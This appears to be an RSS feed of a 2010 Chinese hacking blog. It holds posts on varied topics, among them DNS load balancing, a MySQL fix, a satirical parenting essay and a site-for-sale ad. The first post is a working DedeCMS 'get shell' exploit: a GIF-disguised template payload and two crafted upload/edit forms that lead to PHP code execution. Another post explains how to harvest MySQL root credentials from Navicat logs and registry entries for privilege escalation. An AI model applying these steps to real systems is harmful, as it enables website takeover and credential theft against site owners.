<![CDATA[许诺's Blog]]> http://www.swhack.cn/ zh-cn PBlog2 v2.4 许诺's Blog http://www.swhack.cn/images/logos.gif http://www.swhack.cn/ 许诺's Blog http://www.swhack.cn/article.asp?id=285 <![CDATA[dedecms v5.3-v5.6 Get Shell 0day利用分析 ]]> 251812239@qq.com(许诺) Tue,17 Aug 2010 23:17:24 +0800 http://www.swhack.cn/default.asp?id=285 team:www.wolvez.org

此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif

发表文章,然后构造修改表单如下:
复制内容到剪贴板程序代码 程序代码
<form  action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />  
<input  name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>







红色部分都 是需要注意的地方,得根据实际情况进行对应修改。
修改完成后查看文章即可。]]> http://www.swhack.cn/article.asp?id=284 <![CDATA[哎 国内整顿越来越强力了]]> 251812239@qq.com(许诺) Sun,15 Aug 2010 23:49:43 +0800 http://www.swhack.cn/default.asp?id=284 华夏 黑基改版
黑客动画吧整改

今天凌晨刀客城也会关闭

t00ls貌似也准备内部化

越来越和谐。以后越来越难看到精品了]]> http://www.swhack.cn/article.asp?id=283 <![CDATA[如何毁掉你的孩子[转载]]]> 251812239@qq.com(许诺) Mon,09 Aug 2010 19:17:19 +0800 http://www.swhack.cn/default.asp?id=283
首先应该做的是摧毁孩子的自尊,将孩子贬到卑微的地位上。具体方法有这样几条:

1、让孩子觉得自己什么都不行,没人赏识他。例如学习不行,长相不行,交际不行,干家务不行,马虎,粗心,让家人为他受累……总之,他没有行的地方。

2、经常拿比他"行"的人刺激他。例如这种话要时常挂在嘴边:"看人家××,从不让父母操心!"这类话最具打击力和摧毁力,是毁孩子的王牌语录。

3、父母把自己塑造成为家庭牺牲者的形象,这样会使孩子产生罪恶感。而一个有罪恶感的人往往采用自暴自弃的方法度过一生。具体方法举例如下:经常告诉孩子,自从有了他,你连电影也没看过,你为他操碎了心,都累出病来了,最好再具体说出你身上的哪种病是由于他造成的。或者说,如果不是为了照顾他,自己早就在事业上有大发展了。

4、和孩子说话时口气决不能和蔼,切不可使用商量的口吻,一定要使音量达到70分贝以上,一定要使用命令式的口吻。如果还能配合一些挖苦讽刺的汉语词组,则效果更佳。如"你真蠢""你混""没见过你这么傻的""怎么生了你这么个东西"等等。

5、孩子的一切要由你来决定,切不可给他一点儿自由,他的行踪你要密切注视。他如果有日记,一定要设法查看;他如果有信件,一定要审查。这样做能在他心里造成他不是人的感觉,造成他是一个受人操纵的木偶的感觉。一个怀疑自己不是人的人是绝不可能奋发上进的。

6、要学会迁怒的本事。单位上遇到不顺心的事,回来后要想方设法找理由给孩子泼狗血。无论什么事都归功于孩子的过错然后教训他,并制止他流眼泪。这样做可以有效地打击孩子的自尊心,增强孩子的自卑感,同样可以造成他不是人的感觉。

7、当众出孩子的丑。前6条都是在家庭里的"单练"。真正要彻底毁掉他,这第7条才是杀手锏。你一定要当着外人(或同学或亲友或邻居)损他,贬他,让他无地自容。从心理学角度讲,这样做能使一个人产生惧怕社会的心理,产生自惭形秽的念头。而一个惧怕社会和自惭形秽的人是很难立足於社会的。



您掌握了以上7条,就基本上可以毁掉自己的孩子了。当然,还得在实践中不断总结经验,做到运用自如,这样才能将你的孩子彻底毁掉,使他终身一事无成。]]> http://www.swhack.cn/article.asp?id=281 <![CDATA[出售一个日流量22W的站和XX站聊天室房间]]> 251812239@qq.com(许诺) Fri,30 Jul 2010 10:35:21 +0800 http://www.swhack.cn/default.asp?id=281
现在日流量22W左右了

需要的自己报价给我。 直接邮件给我或者QQ

另外代朋友半价出售XX UC聊天室(百度第一个)所有东西 包括各类型房间

邮箱hack@swhack.cn  

]]> http://www.swhack.cn/article.asp?id=280 <![CDATA[利用navicat提权]]> 251812239@qq.com(许诺) Wed,28 Jul 2010 23:26:56 +0800 http://www.swhack.cn/default.asp?id=280 有两个方法提权: .
1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt  
2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下,导出注册表导入到本机然后星号察看就OK了。。

作者不祥,所以未有版


]]> http://www.swhack.cn/article.asp?id=279 <![CDATA[根据你的QQ号可以算出你的年龄]]> 251812239@qq.com(许诺) Wed,28 Jul 2010 09:05:22 +0800 http://www.swhack.cn/default.asp?id=279
2.用你QQ号码的第一位乘以五

3.把这个数加上8

4.再把所得的结果乘以20

5.如果你的生日过了,加1848,如果没过,加1847

6.把所得结果减去你的出生年份

7.现在你会得到一个3位数

8.百位上的数字就是你的QQ号码的第一位

9.十位和个位就成了一个两位数,用这个数加上3就是你的年龄了。

10.准不准、
]]> http://www.swhack.cn/article.asp?id=278 <![CDATA[交换链接的事项]]> 251812239@qq.com(许诺) Tue,27 Jul 2010 17:40:05 +0800 http://www.swhack.cn/default.asp?id=278 而且不是同类的技术类站点,不予链接了,内容独特的除外。
没办法,百度对我俗气,把我关键字全部降权了。所以我也只有俗气一回了。
另外把本站放在内页的。我会相应删除你的链接,同时也请你删除我的。
希望理解
]]> http://www.swhack.cn/article.asp?id=277 <![CDATA[win2003偶尔出现Can not connect to MySQL server]]> 251812239@qq.com(许诺) Wed,21 Jul 2010 17:23:44 +0800 http://www.swhack.cn/default.asp?id=277
第一种:卸载KB967723补丁
登录服务器,进入控制面板 — 添加和删除程序 — (勾选上方的“显示更新”)在里面可以看到更新的KB967723这个补丁,然后就想卸载普通软件一样卸载,卸载中会提示你,如果卸载可能导致程序运行出错,没关系,选择“是”,继续卸载。卸载完成后重启数据库服务器。

第二种:修改注册表
本方法是微软给出的修改注册表修复该Bug的的方法,原因是默认最大的临时 TCP 端口的数是 5000 适用于一节中包含的产品中。 在这些产品中添加一个新参数。 要提高临时端口的上限,请按照下列步骤操作:

开始 → 运行 → 输入regedit → 启动注册表编辑器。
在注册表中找到以下子项,然后单击 参数 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
在 编辑 菜单上单击 新建,然后添加下面的注册表项:
数值名称: MaxUserPort
值类型: DWORD
值数据: 65534
有效范围: 5000-65534 (十进制)
默认值: 0x1388 (5000 十进制)
说明: 此参数将控制程序从系统请求任何可用的用户端口时使用的最大端口数。 通常,1024 的值和包含的 5000 之间分配临时的 (短) 端口。
退出注册表编辑器,并重新启动计算机。
微软原文链接:http://support.microsoft.com/kb/q196271



现此问题的原因是因为微软2009年发布了TCP/IP更新补丁(KB967723),如果服务器开启自动更新或者有自动更新软件下载更新了这个补丁,那么就会出现这个问题。出现Can not connect to MySQL server错误

]]> http://www.swhack.cn/article.asp?id=276 <![CDATA[Web服务器负载均衡的几种方案 : DNS轮询]]> 251812239@qq.com(许诺) Sun,18 Jul 2010 23:39:46 +0800 http://www.swhack.cn/default.asp?id=276
大多域名注册商都支持多条A记录 的解析,其实这就是DNS轮询 ,DNS 服务器 将解析请求按照A记录 的顺序,逐一分配到不同的IP上,这样就完成了简单的负载均衡 。


优点

基本上无成本,因为往往域名注册商的这种解析都是免费的;  
部署方便,除了网络拓扑的简单扩增,新增的Web服务器只要增加一个公网IP即可。
  
缺点

健康检查,如果某台服务器宕机,DNS服务器是无法知晓的,仍旧会将访问分配到此服务器。修改DNS记录全部生效起码要3-4小时,甚至更久;  
分配不均,如果几台Web服务器之间的配置不同,能够承受的压力也就不同,但是DNS解析分配的访问却是均匀分配的。其实DNS也是有分配算法的,可以根据当前连接较少的分配、可以设置Rate权重分配等等,只是目前绝大多数的DNS服务器都不支持;  
会话保持,如果是需要身份验证的网站,在不修改软件构架的情况下,这点是比较致命的,因为DNS解析无法将验证用户的访问持久分配到同一服务器。虽然有一定的本地DNS缓存,但是很难保证在用户访问期间,本地DNS不过期,而重新查询服务器并指向新的服务器,那么原服务器保存的用户信息是无法被带到新服务器的,而且可能要求被重新认证身份,来回切换时间长了各台服务器都保存有用户不同的信息,对服务器资源也是一种浪费。
  
部署方法  

这个是万网的域名控制面板,将同一域名解析到2条A记录 上。


这个是免费的智能DNS 解析服务,www.dns pod.com,不仅可以多条A记录 ,而且还能使用中国特色,根据电信、网通、教育网的用户访问,解析到不同的IP上。


实验  

先将www.fuckegg.com的A记录 解析到x.x.x.x和x.x.x.n上,然后使用nslookup工具查看。
直接用cmd命令nslookup看到 解析到了两个IP了

关于DNS 服务器 的压力问题,其实并不用太过担心,因为解析记录通常都是有一小时的缓存的,如果用户最近一级的DNS 服务器 上的解析记录还未过期的话,是不用查询主服务器 的,通常DNS 都有一小时的缓存,所以这样就等于把压力分摊到了各用户最近一级的DNS 服务器 上了。
]]> http://www.swhack.cn/article.asp?id=274 <![CDATA[闲言闲语不必理会]]> 251812239@qq.com(许诺) Tue,06 Jul 2010 23:46:39 +0800 http://www.swhack.cn/default.asp?id=274
当你发现为时已晚的时候,恰恰是最好的开始~!

暑假目标  c++攻克  java看至多线程]]>